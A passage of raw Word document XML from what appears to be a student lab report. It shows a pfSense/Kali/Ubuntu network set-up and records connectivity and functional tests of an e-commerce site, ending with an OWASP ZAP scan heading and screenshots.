    </w:p>
    <w:p w14:paraId="518D6412" w14:textId="5A22C647" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>The pfsense VM has also been used to provide static ip addresses to the kali and ubuntu server</w:t>
      </w:r>
      <w:r w:rsidR="009E0EFC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3844DC1C" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:object w:dxaOrig="9010" w:dyaOrig="6240" w14:anchorId="4335A611">
          <v:shape id="_x0000_i1030" type="#_x0000_t75" style="width:450.5pt;height:312pt" o:ole="">
            <v:imagedata r:id="rId37" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Paint.Picture" ShapeID="_x0000_i1030" DrawAspect="Content" ObjectID="_1710221370" r:id="rId38"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BCE248" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:object w:dxaOrig="9010" w:dyaOrig="6240" w14:anchorId="7C30A7E0">
          <v:shape id="_x0000_i1031" type="#_x0000_t75" style="width:450.5pt;height:312pt" o:ole="">
            <v:imagedata r:id="rId39" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Paint.Picture" ShapeID="_x0000_i1031" DrawAspect="Content" ObjectID="_1710221371" r:id="rId40"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D41C245" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832"/>
    <w:p w14:paraId="7EC689EF" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832"/>
    <w:p w14:paraId="3175D5AB" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C9664A8" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0884ECCE" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A686B42" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="397ADAFB" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7143C194" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F713F35" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53840805" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A3EE61A" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77BF55BE" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F150310" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09086122" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C0A7246" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FFC1B35" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1897E84B" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D4A2B6B" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EE031D4" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21A690DC" w14:textId="71705E57" w:rsidR="00306832" w:rsidRDefault="00A861C7" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3: </w:t>
      </w:r>
      <w:r w:rsidR="00306832">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TESTING</w:t>
      </w:r>
      <w:r w:rsidR="009E0EFC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> OF INITIAL SET-UP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E10054B" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>Connectivity test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A7B8A9" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>From Ubuntu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1863D788" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>-To google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49502F5B" w14:textId="475803E3" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71A52413" wp14:editId="078D007A">
            <wp:extent cx="4616450" cy="158750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6450" cy="1587500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2435A3AE" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>-To Pfsense (DMZ interface)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D51A16" w14:textId="241C8567" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6765D5BA" wp14:editId="4657747C">
            <wp:extent cx="3644900" cy="116840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4900" cy="1168400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62568998" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>-To kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE970A0" w14:textId="1E6C5CC4" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48C51EE8" wp14:editId="71C49A9D">
            <wp:extent cx="3644900" cy="105410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4900" cy="1054100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12926CE4" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>-Web e-commerce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1668143D" w14:textId="47621F8F" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D3F780E" wp14:editId="4C03A721">
            <wp:extent cx="5734050" cy="3530600"/>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ical user interfac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530600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DD1E7C" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>From Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE748FA" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>-To google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E74EB3" w14:textId="286074A4" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16ED9FC2" wp14:editId="0F1EB708">
            <wp:extent cx="5645150" cy="1866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5150" cy="1866900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C3057C" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>-To Pfsense (LAN Interface)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B66BCB" w14:textId="7F72783B" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="351693D1" wp14:editId="6ECB11B0">
            <wp:extent cx="4819650" cy="1308100"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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9650" cy="1308100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52522D6D" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>-To Ubuntu web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A590E8" w14:textId="083814B7" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E319790" wp14:editId="1D84BC4A">
            <wp:extent cx="4781550" cy="1231900"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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81550" cy="1231900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB4D3BF" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>Web e-commerce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532C1A75" w14:textId="3D85FE0F" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F90329A" wp14:editId="6D9D1044">
            <wp:extent cx="5734050" cy="3352800"/>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picture containing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14:paraId="5DFFCCB3" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Functionality:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395CD2D5" w14:textId="55E4D998" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>Product, brand, categories, sign in, log in, cart, search bar</w:t>
      </w:r>
      <w:r w:rsidR="009E0EFC">
        <w:t xml:space="preserve"> all successfully tested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39110D1F" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>Product detail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E312CA3" w14:textId="30FD36B5" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29F1F5C5" wp14:editId="0342B3ED">
            <wp:extent cx="5734050" cy="2362200"/>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al user interface, text,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2362200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D40A3B8" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832"/>
    <w:p w14:paraId="1F8A42E8" w14:textId="7DB7BFA9" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>Cart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16358205" w14:textId="2E7BED99" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="426E4668" wp14:editId="1408BE5F">
            <wp:extent cx="5734050" cy="1270000"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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al user interface, text, applicatio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1270000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC9B516" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>Costumer register</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E34DA77" w14:textId="278473CF" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B8FD455" wp14:editId="4942ECD5">
            <wp:extent cx="5734050" cy="2914650"/>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2914650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9DCCCD" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00306832"/>
    <w:p w14:paraId="64DB4A1C" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00306832"/>
    <w:p w14:paraId="44069890" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00306832"/>
    <w:p w14:paraId="433C8D1B" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00306832"/>
    <w:p w14:paraId="2CAE0064" w14:textId="4C17AC5F" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Costumers log in </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A51CB28" w14:textId="5D1E1075" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77D17E78" wp14:editId="33A85DAA">
            <wp:extent cx="5734050" cy="158750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phical user interface, text, applicati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1587500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEB744E" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>Order details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D9A5B5" w14:textId="2F43AA6D" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AEDA746" wp14:editId="79222DCB">
            <wp:extent cx="5727700" cy="1968500"/>
            <wp:effectExtent l="0" t="0" r="635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0" cy="1968500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FACADE3" w14:textId="77777777" w:rsidR="009E0EFC" w:rsidRDefault="009E0EFC" w:rsidP="00306832"/>
    <w:p w14:paraId="3DB6F4A2" w14:textId="477C8950" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>Payment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED3C990" w14:textId="3874047C" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A36EEA3" wp14:editId="7AC37BDF">
            <wp:extent cx="2292350" cy="2336800"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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phical user interface, text,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2350" cy="2336800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE86392" w14:textId="77777777" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:t>Successful payment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27408BBE" w14:textId="74D73610" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="386DC49F" wp14:editId="030FDB91">
            <wp:extent cx="4591050" cy="8255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phical user interface, text,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1050" cy="825500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2454F332" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00306832"/>
    <w:p w14:paraId="7BEF1C57" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00306832"/>
    <w:p w14:paraId="0CBBE83A" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00306832"/>
    <w:p w14:paraId="7081E92D" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00306832"/>
    <w:p w14:paraId="723DB83C" w14:textId="1FC8AC2C" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Stripe account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D1C930" w14:textId="5CFD4D6D" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="661CE6B2" wp14:editId="6098B24E">
            <wp:extent cx="5734050" cy="1479550"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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aphical user interface, text,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4050" cy="1479550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D846F65" w14:textId="77777777" w:rsidR="009E0EFC" w:rsidRDefault="009E0EFC" w:rsidP="00306832"/>
    <w:p w14:paraId="3F2005C9" w14:textId="635C0DA5" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OWASP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Zap scan results testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8AD792" w14:textId="5E22CF19" w:rsidR="00306832" w:rsidRDefault="00306832" w:rsidP="00306832">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DCB19D2" wp14:editId="42881120">
            <wp:extent cx="5734050" cy="375285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aphical user interface, text, application, email&#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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AF9765" w14:textId="077A0E98" w:rsidR="009E0EFC" w:rsidRPr="009E0EFC" w:rsidRDefault="009E0EFC" w:rsidP="00306832">
      <w:r w:rsidRPr="009E0EFC">
        <w:t>All initial test was completed successfully</w:t>
      </w:r>
      <w:r w:rsidR="00A40517">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009E0EFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A40517">
        <w:t>Though a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> few alterations will</w:t>
      </w:r>
      <w:r w:rsidR="009D078A">
        <w:t xml:space="preserve"> be made to further bolster the base-level security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3E2203" w14:textId="77777777" w:rsidR="009D078A" w:rsidRDefault="009D078A" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12B60A95" w14:textId="77777777" w:rsidR="009D078A" w:rsidRDefault="009D078A" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="380BFBE7" w14:textId="77777777" w:rsidR="009D078A" w:rsidRDefault="009D078A" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22CC948D" w14:textId="77777777" w:rsidR="009D078A" w:rsidRDefault="009D078A" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4709B774" w14:textId="77777777" w:rsidR="009D078A" w:rsidRDefault="009D078A" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DF6497E" w14:textId="77777777" w:rsidR="009D078A" w:rsidRDefault="009D078A" w:rsidP="00306832">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
